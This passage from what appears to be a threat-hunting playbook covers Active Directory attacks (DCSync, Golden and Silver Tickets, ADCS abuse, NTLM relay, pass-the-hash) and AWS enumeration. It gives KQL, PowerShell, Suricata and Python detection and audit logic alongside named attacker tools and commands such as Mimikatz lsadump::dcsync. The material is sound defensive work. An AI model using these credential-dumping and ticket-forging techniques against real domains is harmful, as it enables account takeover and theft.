By default, Kerberos pre-authentication requires proving knowledge of a password before the DC returns any encrypted material. Some legacy accounts have pre-auth disabled (via the DONT_REQ_PREAUTH flag). For those accounts, anyone can request an AS-REP and receive a blob encrypted with the user's password hash, crackable offline (hashcat mode 18200).

What to look for

Event 4768 where PreAuthType is 0 (meaning no pre-auth required) and TicketEncryptionType is RC4. Also hunt for users with UserAccountControl flag 4194304 (DONT_REQ_PREAUTH) set.

KQL AS-REP request with no pre-authentication: extremely rare legitimate use
event.code:4768 and winlog.event_data.PreAuthType:"0" and winlog.event_data.TicketEncryptionType:"0x17"
PowerShell (audit) Find all AS-REP-roastable accounts in your domain
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth, PasswordLastSet |
    Where-Object {$_.Enabled -eq $true} |
    Select Name, SamAccountName, PasswordLastSet

๐Ÿ›ก๏ธ Mitigations

  • Disable 'Do not require Kerberos preauthentication' on ALL accounts; no modern app should need this
  • If a legacy app requires it, enforce 25+ character passwords on that account specifically
  • Alert on any user being granted DONT_REQ_PREAUTH (Event 4738 with UAC flag changes)

Tools used by attackers / defenders

Rubeus asreproast, Impacket GetNPUsers.py, hashcat -m 18200
T1003.006

DCSync

CRITICAL [MITRE]

Summary: Use the Directory Replication Service (DRS) protocol to request password hashes for any account, including krbtgt, without executing code on a DC. Game-over if successful.

Why this matters

DCSync abuses the normal AD replication process. Any account with Replicating Directory Changes + Replicating Directory Changes All + Replicating Directory Changes in Filtered Set rights can request replication data, which includes password hashes. Domain Admins, Enterprise Admins, and the DCs themselves have these rights. Attackers add these rights to a compromised account, then dump everything including krbtgt (enabling Golden Ticket attacks).

What to look for

Event 4662 with Properties GUIDs 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes) and 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes-All), from a non-DC host. Also hunt for permission changes granting these rights via Event 5136.

KQL DCSync replication request from non-DC host
event.code:4662 and winlog.event_data.Properties:(*1131f6aa-9c07-11d1-f79f-00c04fc2dcd2* or *1131f6ad-9c07-11d1-f79f-00c04fc2dcd2*) and not user.name:(*$ or MSOL_* or AAD_*)
-- 4662 is only written when "Audit Directory Service Access" is enabled on the DCs; verify with a test replication from a lab account before trusting the absence of hits. Only DC computer accounts and your Entra Connect account should ever appear as SubjectUserName
KQL ACL modification granting replication rights (attacker setup step)
event.code:5136 and winlog.event_data.AttributeLDAPDisplayName:"nTSecurityDescriptor" and winlog.event_data.AttributeValue:*1131f6aa-9c07-11d1-f79f-00c04fc2dcd2*
PowerShell (audit) Find all accounts with DCSync rights currently granted
Import-Module ActiveDirectory   # provides the AD: drive used by Get-Acl below
$Domain = Get-ADDomain
$DN = $Domain.DistinguishedName
(Get-Acl "AD:$DN").Access |
    Where-Object {$_.ObjectType -in "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"} |
    Select IdentityReference, ActiveDirectoryRights

๐Ÿ›ก๏ธ Mitigations

  • Audit replication permissions monthly; only DCs and Entra Connect should have them
  • Alert immediately on any ACL change to the domain root granting replication rights
  • If DCSync is suspected, reset krbtgt twice, waiting at least the maximum TGT lifetime (10 hours by default) plus replication convergence between the two resets
  • Implement Tier 0 isolation โ€” Domain Admins should never touch user workstations

Tools used by attackers / defenders

Mimikatz lsadump::dcsync, Impacket secretsdump.py, DSInternals Get-ADReplAccount
T1558.001

Golden Ticket Attack

CRITICAL [MITRE]

Summary: Forge a Kerberos TGT using the krbtgt account's password hash; this grants domain-wide access that survives password changes for everyone except krbtgt itself.

Why this matters

The krbtgt account signs every TGT issued in a domain. If an attacker obtains its NTLM hash (typically via DCSync), they can forge TGTs for ANY user including non-existent ones, with ANY group memberships, valid for up to 10 years by default. This is the ultimate persistence: invisible to password resets, MFA, account disables, and most detection stacks.

What to look for

Forged TGTs leave few DC-side traces because no DC issued them. Look for 4769 TGS requests and 4624 logons for accounts that do not exist in AD, for 4624/4672/4634 events where the Account Domain field is the domain FQDN or blank instead of the NetBIOS name (a known artifact of some forging tools), and for a TGS (4769) with no matching TGT request (4768) for that user on any DC. Ticket lifetime is not written to 4768/4769; inspect it with klist on the suspected host.

KQL Account Domain field anomaly in logon events: FQDN where the NetBIOS name is expected
event.code:4624 and winlog.event_data.AuthenticationPackageName:"Kerberos" and winlog.event_data.TargetDomainName:*.*
-- Matches the FQDN form (corp.local) where the NetBIOS name (CORP) is expected; blank values need "not winlog.event_data.TargetDomainName:*" as a second query. Tool-dependent: some forging tools set the domain correctly
-- Lifetime is checked on the host, not in 4768: klist shows Start Time and End Time per cached ticket, and a TGT valid for years is forged
KQL Kerberos authentication for non-existent account
event.code:4624 and winlog.event_data.AuthenticationPackageName:"Kerberos"
-- Correlate user.name against current AD user list
-- Alert on user not present in AD
PowerShell (defensive) Check krbtgt password age: if it was never rotated or is very old, treat the domain as possibly compromised
Get-ADUser "krbtgt" -Properties PasswordLastSet, whenChanged | Select Name, PasswordLastSet, whenChanged

๐Ÿ›ก๏ธ Mitigations

  • Rotate the krbtgt password twice on a schedule (e.g. every 180 days), waiting at least the maximum TGT lifetime (10 hours by default) plus replication between the two resets so that legitimately issued tickets are not invalidated
  • If compromise is suspected, do the same double reset immediately; a very short gap between the two resets forces every client to re-authenticate at once, so plan the change window
  • Monitor for TGTs with lifetimes exceeding domain policy
  • Deploy DC-side logging: Event 4769 with unusual fields, Event 4624 on domain-joined hosts

Tools used by attackers / defenders

Mimikatz kerberos::golden, Rubeus golden, Impacket ticketer.py
T1558.002

Silver Ticket Attack

HIGH [MITRE]

Summary: Forge a service ticket (TGS) using a service account's hash; this grants access to one specific service but bypasses the DC entirely.

Why this matters

Unlike Golden Tickets (which require krbtgt), Silver Tickets only need the hash of the target service account. They're harder to detect because they generate no Domain Controller logs; the forged TGS is presented directly to the target service. Useful for sustained access to specific high-value services (SQL Server, Exchange, SharePoint) even after other access is revoked.

What to look for

Silver Tickets deliberately avoid DC logs, so you must look at the service side. Event 4624 on the target member server with no corresponding Event 4768/4769 on any DC. PAC validation failures when the target service checks the ticket with a DC.

KQL Kerberos logon on member server with no DC-side TGS issuance
event.code:4624 and winlog.event_data.AuthenticationPackageName:"Kerberos" and not host.role:"domain_controller"
-- Correlate against 4769 on all DCs
-- Alert when no matching 4769 exists for the logon
KQL Kerberos failures on the service host and KDC-side PAC checks that can indicate ticket forgery
winlog.channel:"System" and event.code:(40960 or 40961)
-- LsaSrv 40960/40961 are logged by the member server, not the DC. The KDC hardening from KB5008380 (PacRequestorEnforcement) and KB5020805 (KrbtgtFullPacSignature) adds Microsoft-Windows-Kerberos-Key-Distribution-Center events in the System log of DCs for tickets that fail the PAC requestor or full PAC signature checks; see those KBs for the exact IDs
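The correlation described in the first card above (a Kerberos network logon on a member server with no service ticket issued by any DC) is a join across two log sources that KQL alone cannot express. The following is an added example, not the playbook's code, run over constructed 4624 and 4769/4770 records: it normalises the account name, keys the DC events on (user, HOST$) because 4769 records the computer account in ServiceName, and uses the default 600-minute service ticket lifetime as the look-back. Field names are the Winlogbeat event_data names and host.name is assumed to be the short computer name.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def _ts(value):
    return datetime.fromisoformat(value)


def _account(name):
    """Normalise jdoe@CORP.LOCAL, CORP\\jdoe or jdoe to 'jdoe'."""
    return name.split("@")[0].split("\\")[-1].lower()


# Constructed DC-side ticket events (4769 issued, 4770 renewed), all DCs merged. Not real logs.
TGS_EVENTS = [
    {"event.code": 4769, "@timestamp": "2024-03-04T09:55:00", "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "SQL01$"},
    {"event.code": 4769, "@timestamp": "2024-03-04T00:30:00", "TargetUserName": "asmith@CORP.LOCAL", "ServiceName": "FS01$"},
    {"event.code": 4770, "@timestamp": "2024-03-04T10:20:00", "TargetUserName": "bkim@CORP.LOCAL", "ServiceName": "FS01$"},
]

# Constructed member-server 4624 events (network logons). Not real logs.
LOGONS = [
    {"event.code": 4624, "@timestamp": "2024-03-04T10:00:00", "host.name": "SQL01", "TargetUserName": "jdoe", "LogonType": 3, "AuthenticationPackageName": "Kerberos"},
    {"event.code": 4624, "@timestamp": "2024-03-04T10:30:00", "host.name": "SQL01", "TargetUserName": "svc_backup", "LogonType": 3, "AuthenticationPackageName": "Kerberos"},
    {"event.code": 4624, "@timestamp": "2024-03-04T11:00:00", "host.name": "FS01", "TargetUserName": "asmith", "LogonType": 3, "AuthenticationPackageName": "Kerberos"},
    {"event.code": 4624, "@timestamp": "2024-03-04T10:45:00", "host.name": "FS01", "TargetUserName": "bkim", "LogonType": 3, "AuthenticationPackageName": "Kerberos"},
    {"event.code": 4624, "@timestamp": "2024-03-04T10:50:00", "host.name": "FS01", "TargetUserName": "mlee", "LogonType": 3, "AuthenticationPackageName": "NTLM"},
]


def unmatched_kerberos_logons(logons, tgs_events, lookback=timedelta(hours=10)):
    """Flag Kerberos network logons on member servers for which no DC issued (4769)
    or renewed (4770) a service ticket for (user, HOST$) within `lookback` before
    the logon. The default is the 600-minute maximum service ticket lifetime;
    raise it if the domain policy is longer. Tickets are cached, so the DC event
    can legitimately predate the logon by hours."""
    issued = defaultdict(list)
    for ev in tgs_events:
        if ev["event.code"] in (4769, 4770):
            key = (_account(ev["TargetUserName"]), ev["ServiceName"].lower())
            issued[key].append(_ts(ev["@timestamp"]))
    alerts = []
    for lg in logons:
        if lg["event.code"] != 4624 or lg["AuthenticationPackageName"] != "Kerberos" or lg["LogonType"] != 3:
            continue
        t = _ts(lg["@timestamp"])
        key = (_account(lg["TargetUserName"]), lg["host.name"].lower() + "$")
        if not any(t - lookback <= issued_at <= t for issued_at in issued.get(key, [])):
            alerts.append({"host": lg["host.name"], "user": lg["TargetUserName"], "logon_time": lg["@timestamp"]})
    return alerts


if __name__ == "__main__":
    for alert in unmatched_kerberos_logons(LOGONS, TGS_EVENTS):
        print(alert)
```

In the constructed data jdoe and bkim correlate (bkim through a 4770 renewal, which is why renewals must be ingested too), svc_backup has no ticket at all, and asmith's only ticket was issued 10.5 hours earlier: under the default policy that ticket had expired, so a logon still succeeding with it points at either a renewal you are not collecting or a forged ticket. Missing DC logs produce the same result, so confirm Winlogbeat coverage on every DC before raising an alert from this join.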

๐Ÿ›ก๏ธ Mitigations

  • Rotate service account passwords regularly (every 90 days at most) and make them long and random, since the service hash is all a Silver Ticket needs
  • Use gMSAs for all service accounts where possible
  • Apply the KDC hardening from KB5008380 (PacRequestorEnforcement) and KB5020805 (KrbtgtFullPacSignature) in enforcement mode; these add PAC signatures a forged ticket cannot supply and log tickets that lack them
  • Correlate Kerberos logons against DC-side ticket issuance; a missing TGS is a red flag

Tools used by attackers / defenders

Mimikatz kerberos::golden /service:<spn>, Rubeus silver, Impacket ticketer.py
T1649

ADCS Abuse (ESC1-ESC15)

CRITICAL [MITRE]

Summary: Exploit Active Directory Certificate Services misconfigurations (cataloged as ESC1 through ESC15, starting with SpecterOps' Certified Pre-Owned research and extended by later work) to obtain certificates that grant domain privileges.

Why this matters

ADCS is widely underestimated. Misconfigured certificate templates let low-privilege users request certificates that authenticate as Domain Admin. The ESC numbering catalogs 15 distinct attack paths; ESC1 alone (the template lets the requester supply the subject and the certificate is valid for client authentication) turns up in a large share of enterprise ADCS deployments. Once abused it is full domain takeover with a very small forensic footprint: one certificate request and a PKINIT logon.

What to look for

Event 4886 (Certificate Services received request) and 4887 (approved) with unusual requesters or templates. Certificate requests where SubjectAltName contains a Domain Admin UPN. Templates with ENROLLEE_SUPPLIES_SUBJECT (msPKI-Certificate-Name-Flag = 1) combined with CLIENT_AUTH EKU.

KQL Certificate request attributes naming a privileged account: ESC6-style SAN injection
event.code:(4886 or 4887) and winlog.event_data.Attributes:*san:* and (winlog.event_data.Attributes:*administrator* or winlog.event_data.Attributes:*krbtgt* or winlog.event_data.Attributes:*admin*)
-- 4886/4887 carry the request attributes, Requester and Subject, not the final SAN. ESC1 puts the SAN inside the CSR, so pivot from the 4887 RequestId to the CA database (certutil -view -restrict "RequestID=<n>") to read the issued certificate's SAN
KQL Certificate authentication (PKINIT): correlate against certificate issuance logs
event.code:4768 and winlog.event_data.CertIssuerName:*
-- Hunt for PKINIT authentications by high-privilege accounts from unusual hosts
PowerShell (audit) Find vulnerable templates: Certify gives the attacker's view, PSPKIAudit the defender's
# Attacker perspective, from any domain-joined host:
#   Certify.exe find /vulnerable
# Defender perspective (requires the PSPKI module; run as a user with read access to the CA):
Import-Module PSPKIAudit
Invoke-PKIAudit

๐Ÿ›ก๏ธ Mitigations

  • Audit ALL certificate templates; run Certify or PSPKIAudit immediately and re-run after every template change
  • Remove the Client Authentication EKU from templates that allow ENROLLEE_SUPPLIES_SUBJECT, or require manager approval on them
  • Require manager approval on sensitive templates
  • Remove NTLM from the CA web enrollment endpoints (HTTPS with Extended Protection for Authentication, or disable the endpoints) to close ESC8
  • Apply KB5014754 (certificate-based authentication strong mapping, May 2022); the enforcement date has been pushed back more than once, so check the KB for the current phase and review the Kerberos-Key-Distribution-Center audit events it adds before enforcing
  • Monitor Event 4886/4887 for unusual requesters and request attributes, and 4768 PKINIT logons by privileged accounts

Tools used by attackers / defenders

Certipy (Python), Certify (C#), PSPKIAudit (defensive), SpecterOps whitepaper: Certified Pre-Owned
T1557.001

NTLM Relay

HIGH [MITRE]

Summary: Capture NTLM authentication attempts and relay them to another service where the victim has privileges: authentication without ever cracking the hash.

Why this matters

NTLM (especially NTLMv1, and NTLMv2 wherever the target does not enforce signing or channel binding) is relay-vulnerable by design. An attacker forces a victim to authenticate to them (via LLMNR/mDNS/NBT-NS poisoning, WPAD, or coerced authentication such as PetitPotam or PrinterBug), then relays that authentication to a third service like LDAP, SMB or the ADCS web enrollment endpoint, where they act as the victim. ntlmrelayx and the ADCS ESC8 path (NTLM over HTTP relayed to the CA) make this straightforward.

What to look for

Logons from unusual sources, NTLM where Kerberos is expected (a user authenticating to a host by IP address, for instance), spikes in LLMNR/NBT-NS responses from a single host, and coerced authentication patterns: MS-EFSR calls such as EfsRpcOpenFileRaw (PetitPotam), MS-RPRN RpcRemoteFindFirstPrinterChangeNotification (PrinterBug) and MS-DFSNM (DFSCoerce) from hosts that have no business talking RPC to a DC.

KQL NTLMv1 or downgrade: should be essentially zero in modern environments
event.code:4624 and winlog.event_data.AuthenticationPackageName:"NTLM" and winlog.event_data.LmPackageName:"NTLM V1"
KQL PetitPotam / coerced authentication patterns
event.code:5145 and winlog.event_data.ShareName:"\\\\*\\IPC$" and winlog.event_data.RelativeTargetName:("lsarpc" or "efsrpc" or "samr" or "netlogon" or "spoolss" or "netdfs")
-- Requires "Audit Detailed File Share" on DCs and is noisy; alert on IPC$ pipe opens from workstations or servers that never do so, not on the pipe names alone
Suricata LLMNR response on the wire (Responder / Inveigh poisoning)
alert udp any 5355 -> any any (msg:"LLMNR response seen - possible Responder/Inveigh poisoning"; byte_test:1,&,0x80,2; content:"|00 01 00 01|"; offset:4; depth:4; classtype:attempted-recon; sid:9100001; rev:2;)
-- The QR bit (0x80 in byte 2) marks a response; bytes 4-7 are QDCOUNT=1, ANCOUNT=1. Poisoners answer with flags 0x8000 or 0x8400, so test the bit rather than an exact |84 00| value. An LLMNR answer is only suspect once LLMNR is disabled by GPO, so deploy the rule together with that policy and tune it on the sensor's internal VLANs
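To see exactly which bytes the rule above tests, here is an added example (not part of the playbook) that builds a constructed LLMNR query and a poisoned response, parses the message, and applies the same check the Suricata rule does: QR bit in byte 2, QDCOUNT=1 and ANCOUNT=1 in bytes 4-7. The wpad name and the 10.0.0.66 answer are invented.

```python
import struct

QD1_AN1 = b"\x00\x01\x00\x01"   # QDCOUNT=1, ANCOUNT=1 at bytes 4..7 of the header


def read_name(buf, off):
    """Decode a DNS-style label sequence starting at off; pointers are handled
    in case a tool emits them (LLMNR normally repeats the name uncompressed)."""
    labels = []
    while True:
        length = buf[off]
        if length == 0:
            return ".".join(labels), off + 1
        if length & 0xC0 == 0xC0:                      # compression pointer
            ptr = struct.unpack_from("!H", buf, off)[0] & 0x3FFF
            tail, _ = read_name(buf, ptr)
            labels.append(tail)
            return ".".join(labels), off + 2
        off += 1
        labels.append(buf[off:off + length].decode("ascii"))
        off += length


def parse_llmnr(buf):
    """Parse an LLMNR (RFC 4795) message; the header layout matches DNS."""
    tid, flags, qd, an, ns, ar = struct.unpack_from("!6H", buf, 0)
    off = 12
    questions = []
    for _ in range(qd):
        name, off = read_name(buf, off)
        qtype, qclass = struct.unpack_from("!HH", buf, off)
        off += 4
        questions.append({"name": name, "type": qtype})
    answers = []
    for _ in range(an):
        name, off = read_name(buf, off)
        rtype, rclass, ttl, rdlen = struct.unpack_from("!HHIH", buf, off)
        off += 10
        rdata = buf[off:off + rdlen]
        off += rdlen
        value = ".".join(str(b) for b in rdata) if rtype == 1 and rdlen == 4 else rdata.hex()
        answers.append({"name": name, "type": rtype, "ttl": ttl, "rdata": value})
    return {"id": tid, "flags": flags, "is_response": bool(flags & 0x8000),
            "questions": questions, "answers": answers}


def matches_rule(buf):
    """Same test as the Suricata rule: QR bit set (byte 2 & 0x80) and exactly
    one question and one answer (bytes 4..7 == 00 01 00 01)."""
    return len(buf) >= 8 and bool(buf[2] & 0x80) and buf[4:8] == QD1_AN1


def build_llmnr(tid, flags, name, answer_ip=None, ttl=30):
    """Construct an LLMNR query (answer_ip None) or a single A-record response."""
    qname = b"".join(bytes([len(label)]) + label.encode("ascii") for label in name.split(".")) + b"\x00"
    an = 1 if answer_ip else 0
    msg = struct.pack("!6H", tid, flags, 1, an, 0, 0) + qname + struct.pack("!HH", 1, 1)
    if answer_ip:
        rdata = bytes(int(octet) for octet in answer_ip.split("."))
        msg += qname + struct.pack("!HHIH", 1, 1, ttl, 4) + rdata
    return msg


# Constructed traffic: a victim asks for "wpad", a poisoner answers with its own address
QUERY = build_llmnr(0x1234, 0x0000, "wpad")
POISON = build_llmnr(0x1234, 0x8000, "wpad", answer_ip="10.0.0.66")

if __name__ == "__main__":
    print(parse_llmnr(POISON), matches_rule(POISON), matches_rule(QUERY))
```

The parser is what you reach for when the rule fires: the answered name tells you what the victim was looking for (wpad and mistyped share names are the usual bait) and the A record is the poisoner's address, which is the host to isolate.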

๐Ÿ›ก๏ธ Mitigations

  • Disable NTLMv1 (GPO: Network Security: LAN Manager authentication level = Send NTLMv2 response only. Refuse LM & NTLM)
  • Disable LLMNR and NetBIOS over TCP/IP, and disable mDNS on Windows where nothing depends on it
  • Enforce SMB signing and LDAP signing plus LDAPS channel binding domain-wide; relay to an unsigned target is the whole attack
  • Enable Extended Protection for Authentication (EPA) on HTTP services, the CA web enrollment endpoints first (mitigates ESC8)
  • Apply the MS-EFSR (PetitPotam), MS-RPRN (PrinterBug) and MS-DFSNM (DFSCoerce) patches, and disable the Print Spooler on DCs
  • Monitor for EfsRpcOpenFileRaw, RpcRemoteFindFirstPrinterChangeNotification and MS-DFSNM calls to DCs from non-admin hosts

Tools used by attackers / defenders

Impacket ntlmrelayx.py, Responder, PetitPotam, PrinterBug, Inveigh
T1550.002 / .003

Pass-the-Hash / Pass-the-Ticket

HIGH [MITRE]

Summary: Use a stolen NTLM hash (PtH) or Kerberos ticket (PtT) to authenticate without ever knowing the plaintext password.

Why this matters

Windows authentication was designed to accept either the password or the hash; that's how SSO works internally. Once an attacker has the hash (via LSASS dump, SAM dump, DCSync), they can authenticate to anything that accepts NTLM. PtT works similarly with Kerberos tickets exported from memory. Neither requires cracking; both bypass MFA when MFA is layered on top of NTLM/Kerberos rather than integrated.

What to look for

Network logons (Type 3) where LogonProcessName is NtLmSsp and the user is a high-privilege account. Kerberos logons without a corresponding TGS request on the DC (see the Silver Ticket card). On the source host, a 4624 with LogonType 9 (NewCredentials), LogonProcessName seclogo and AuthenticationPackageName Negotiate, which is what Mimikatz sekurlsa::pth produces, followed by Sysmon 10 access to lsass.exe from the same process. The same account authenticating from multiple sources at once. Note that an all-zero LogonGuid is normal for NTLM logons (the field is only populated for Kerberos), so on its own it is not a PtH indicator.

KQL Pass-the-Hash on the source host: Mimikatz sekurlsa::pth style NewCredentials logon
event.code:4624 and winlog.event_data.LogonType:9 and winlog.event_data.LogonProcessName:"seclogo" and winlog.event_data.AuthenticationPackageName:"Negotiate"
-- runas /netonly produces the same LogonType 9 event with LogonProcessName Advapi; the seclogo value is specific to the pth technique. Pair with Sysmon 10 (TargetImage lsass.exe) from the same process
KQL Privileged account using NTLM instead of Kerberos on the target: unusual in modern domains
event.code:4624 and winlog.event_data.LogonType:3 and winlog.event_data.AuthenticationPackageName:"NTLM" and user.name:(*admin* or *svc_*)
KQL Same account logon from 2+ source IPs within 5 minutes
event.code:4624 and winlog.event_data.LogonType:3
-- Aggregate by user.name
-- Count distinct source.ip over 5min window
-- Alert when distinct count >= 2, after excluding VPN pools, jump hosts and service accounts that legitimately fan out; without that baseline this fires constantly

๐Ÿ›ก๏ธ Mitigations

  • Enable Credential Guard on all Windows 10+/Server 2016+ systems
  • Enforce the Tier 0/1/2 model; Domain Admin credentials NEVER touch Tier 1 or Tier 2 hosts
  • Disable NTLM where possible (NTLM Auditing first, then NTLM Block)
  • LAPS for local admin passwords; unique per host means a stolen hash is only reusable on the origin host
  • Enable Protected Users group for privileged accounts (forces Kerberos, no cached creds, no NTLM)

Tools used by attackers / defenders

Mimikatz sekurlsa::pth, Impacket psexec.py/wmiexec.py -hashes, CrackMapExec, Rubeus ptt

โ˜๏ธ AWS CloudTrail 6 cards

Cloud detection patterns built on CloudTrail logs. Covers IAM enumeration, access key anomalies, IAM privilege escalation paths (Rhino Security cataloged 20+), S3 data exfiltration, EC2 IMDS abuse (the Capital One vector), and cross-account AssumeRole abuse. Critical for any role with cleared cloud responsibilities or commercial AWS exposure.

T1087.004

AWS IAM Enumeration

MEDIUM [MITRE]

Summary: Attackers enumerate IAM users, roles, and policies to find privilege escalation paths and high-value targets. Low-risk from the AWS API perspective but diagnostic of intent.

Why this matters

Once an attacker has any AWS credentials, from a leaked access key, SSRF on EC2 metadata, or a compromised developer laptop, the first move is mapping out the account. What roles exist? What policies do I have? What buckets? Can I assume something more privileged? This shows up as a burst of read-only 'List*' and 'Get*' IAM calls.

What to look for

CloudTrail events with rapid-fire `ListUsers`, `ListRoles`, `ListPolicies`, `GetAccountAuthorizationDetails`, `ListAccessKeys` within a short window from a single identity. Especially suspicious from EC2 instance roles or Lambda execution roles.

KQL (Elastic CloudTrail) Burst of IAM enumeration calls from a single identity
event.dataset:"aws.cloudtrail" and event.action:(ListUsers or ListRoles or ListPolicies or ListAccessKeys or ListGroupsForUser or GetAccountAuthorizationDetails)
-- Aggregate by user.name over 5-min windows
-- Alert when distinct event.action count >= 5
KQL GetAccountAuthorizationDetails — single call returns everything, attacker favorite
event.dataset:"aws.cloudtrail" and event.action:"GetAccountAuthorizationDetails" and not user.name:(*terraform* or *pulumi* or *aws-admin*)
AWS CLI (audit) CloudTrail Lake query to find the noisiest IAM enumerators in last 30 days
aws cloudtrail start-query --query-statement "
  SELECT userIdentity.arn, count(*) AS n
  FROM $EDS_ID
  WHERE eventSource = 'iam.amazonaws.com'
    AND (eventName LIKE 'List%' OR eventName LIKE 'Get%')
    AND eventTime > '2026-03-25 00:00:00'
  GROUP BY userIdentity.arn
  ORDER BY n DESC"
-- $EDS_ID is your event data store ID; the parentheses matter, since AND binds tighter than OR
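The burst logic the two KQL sketches above describe, as an added Python example (not code from the playbook): a sliding five-minute window per identity that counts distinct enumeration calls, plus the single-call GetAccountAuthorizationDetails check. The CloudTrail records are constructed and reduced to the fields the logic reads; the automation allow-list substrings are the ones from the KQL.

```python
"""Sliding-window detection of IAM enumeration bursts in CloudTrail records.

Added example (not from the playbook). The records below are constructed
CloudTrail-style events trimmed to the fields this logic reads.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Read-only IAM calls that, issued together in a burst, indicate account mapping.
ENUM_ACTIONS = {
    "ListUsers", "ListRoles", "ListPolicies", "ListAccessKeys",
    "ListGroupsForUser", "GetAccountAuthorizationDetails",
}
# Identities expected to enumerate IAM (same substrings as the card's KQL).
AUTOMATION_MARKERS = ("terraform", "pulumi", "aws-admin")
WINDOW = timedelta(minutes=5)
DISTINCT_THRESHOLD = 5


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def _is_automation(arn):
    return any(m in arn for m in AUTOMATION_MARKERS)


def find_enum_bursts(events, window=WINDOW, threshold=DISTINCT_THRESHOLD):
    """Return {arn: (window_start, sorted distinct actions)} for identities that
    issue >= threshold distinct enumeration calls inside any `window`."""
    by_arn = defaultdict(list)
    for ev in events:
        if ev.get("eventSource") != "iam.amazonaws.com" or ev["eventName"] not in ENUM_ACTIONS:
            continue
        arn = ev["userIdentity"]["arn"]
        if _is_automation(arn):
            continue
        by_arn[arn].append((_ts(ev["eventTime"]), ev["eventName"]))

    findings = {}
    for arn, calls in by_arn.items():
        calls.sort()
        lo = 0
        for hi in range(len(calls)):
            while calls[hi][0] - calls[lo][0] > window:  # keep calls[lo..hi] inside the window
                lo += 1
            distinct = {name for _, name in calls[lo:hi + 1]}
            if len(distinct) >= threshold:
                findings[arn] = (calls[lo][0], sorted(distinct))
                break
    return findings


def auth_details_callers(events):
    """Non-automation identities calling GetAccountAuthorizationDetails: one call
    dumps every user, group, role and policy, so each one deserves review."""
    return sorted({ev["userIdentity"]["arn"] for ev in events
                   if ev["eventName"] == "GetAccountAuthorizationDetails"
                   and not _is_automation(ev["userIdentity"]["arn"])})


def _ev(time, name, arn):
    return {"eventTime": time, "eventSource": "iam.amazonaws.com",
            "eventName": name, "userIdentity": {"arn": arn}}


INSTANCE_ROLE = "arn:aws:sts::111122223333:assumed-role/web-instance-role/i-0abc123def456"
TERRAFORM_ROLE = "arn:aws:sts::111122223333:assumed-role/terraform-apply/ci-run-42"
HUMAN_USER = "arn:aws:iam::111122223333:user/alice"

# Constructed sample: an EC2 instance role mapping the account in 40 seconds,
# a Terraform role doing the same during a plan, and a human making two calls.
SAMPLE_EVENTS = [
    _ev("2026-03-25T10:00:00Z", "ListUsers", INSTANCE_ROLE),
    _ev("2026-03-25T10:00:10Z", "ListRoles", INSTANCE_ROLE),
    _ev("2026-03-25T10:00:20Z", "ListPolicies", INSTANCE_ROLE),
    _ev("2026-03-25T10:00:30Z", "ListAccessKeys", INSTANCE_ROLE),
    _ev("2026-03-25T10:00:40Z", "GetAccountAuthorizationDetails", INSTANCE_ROLE),
    _ev("2026-03-25T10:05:00Z", "ListUsers", TERRAFORM_ROLE),
    _ev("2026-03-25T10:05:01Z", "ListRoles", TERRAFORM_ROLE),
    _ev("2026-03-25T10:05:02Z", "ListPolicies", TERRAFORM_ROLE),
    _ev("2026-03-25T10:05:03Z", "ListAccessKeys", TERRAFORM_ROLE),
    _ev("2026-03-25T10:05:04Z", "GetAccountAuthorizationDetails", TERRAFORM_ROLE),
    _ev("2026-03-25T10:00:00Z", "ListUsers", HUMAN_USER),
    _ev("2026-03-25T10:30:00Z", "ListRoles", HUMAN_USER),
]

if __name__ == "__main__":
    for arn, (start, actions) in find_enum_bursts(SAMPLE_EVENTS).items():
        print(f"BURST {arn} from {start:%H:%M:%S}: {', '.join(actions)}")
    for arn in auth_details_callers(SAMPLE_EVENTS):
        print(f"REVIEW GetAccountAuthorizationDetails by {arn}")
```

The window scan is O(n) per identity, so the same routine runs over a day of CloudTrail from a Lake export or an S3 trail without aggregation in the SIEM; the threshold and window are the knobs to tune against your own baseline of CI and audit roles.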

🛡️ Mitigations

  • Deploy GuardDuty (finding: Discovery:IAMUser/AnomalousBehavior)
  • Use IAM Access Analyzer — identify overly-permissive roles being enumerated
  • Least privilege: services shouldn't have iam:List* unless required
  • Alert on GetAccountAuthorizationDetails from any non-automation identity

🔧 Tools used by attackers / defenders

Pacu, ScoutSuite, CloudSploit, aws-iam-recon
T1078.004

AWS Access Key Anomalies

HIGH [MITRE]

Summary: Detect stolen AWS access keys being used from unusual locations, during unusual hours, or for unusual services.

Why this matters

AWS access keys leak constantly — GitHub commits, Slack messages, laptop theft, dev container images. Once leaked, attackers immediately test them from their own infrastructure. An access key normally used from a corporate IP in US-East suddenly calling STS from Eastern Europe is the classic leak signal. Also watch for keys used in services the owner never uses (e.g., developer key suddenly calling EC2 RunInstances).

What to look for

`sourceIPAddress` for an access key that differs from its historical baseline. New user-agent strings (especially 'aws-cli' or 'boto3' when the owner always uses the console). Activity outside business hours. Calls to EC2, Lambda, or IAM when the key historically only touched S3 and DynamoDB.

KQL Access key used from country not seen before for that key
event.dataset:"aws.cloudtrail" and user.id:AKIA*
-- Leave the wildcard unquoted: inside quotes KQL treats * as a literal character
-- Join against historical source.geo.country_iso_code per access key
-- Alert when new country observed
KQL Console login followed by CLI activity within minutes (key theft pattern)
event.dataset:"aws.cloudtrail" and event.action:"ConsoleLogin"
-- Correlate with same userIdentity using AWS CLI user-agent within 5min
KQL IAM key activity from TOR exit nodes or known VPN providers
event.dataset:"aws.cloudtrail" and source.ip:*
-- Enrich source.ip with threat intel (TOR, abuse ASNs)
-- Alert on match

🛡️ Mitigations

  • Enforce MFA on all IAM users (including programmatic access via AWS CLI --serial-number)
  • Rotate access keys every 90 days minimum
  • Use IAM Identity Center (SSO) + role assumption instead of long-lived keys
  • Scan GitHub, Slack, and internal wikis for leaked AKIA* / ASIA* strings (TruffleHog, git-secrets)
  • Use AWS Config rule: access-keys-rotated

🔧 Tools used by attackers / defenders

TruffleHog, git-secrets, AWS CloudTrail Lake, GuardDuty UnauthorizedAccess:IAMUser/*
T1078.004

AWS Privilege Escalation

CRITICAL [MITRE]

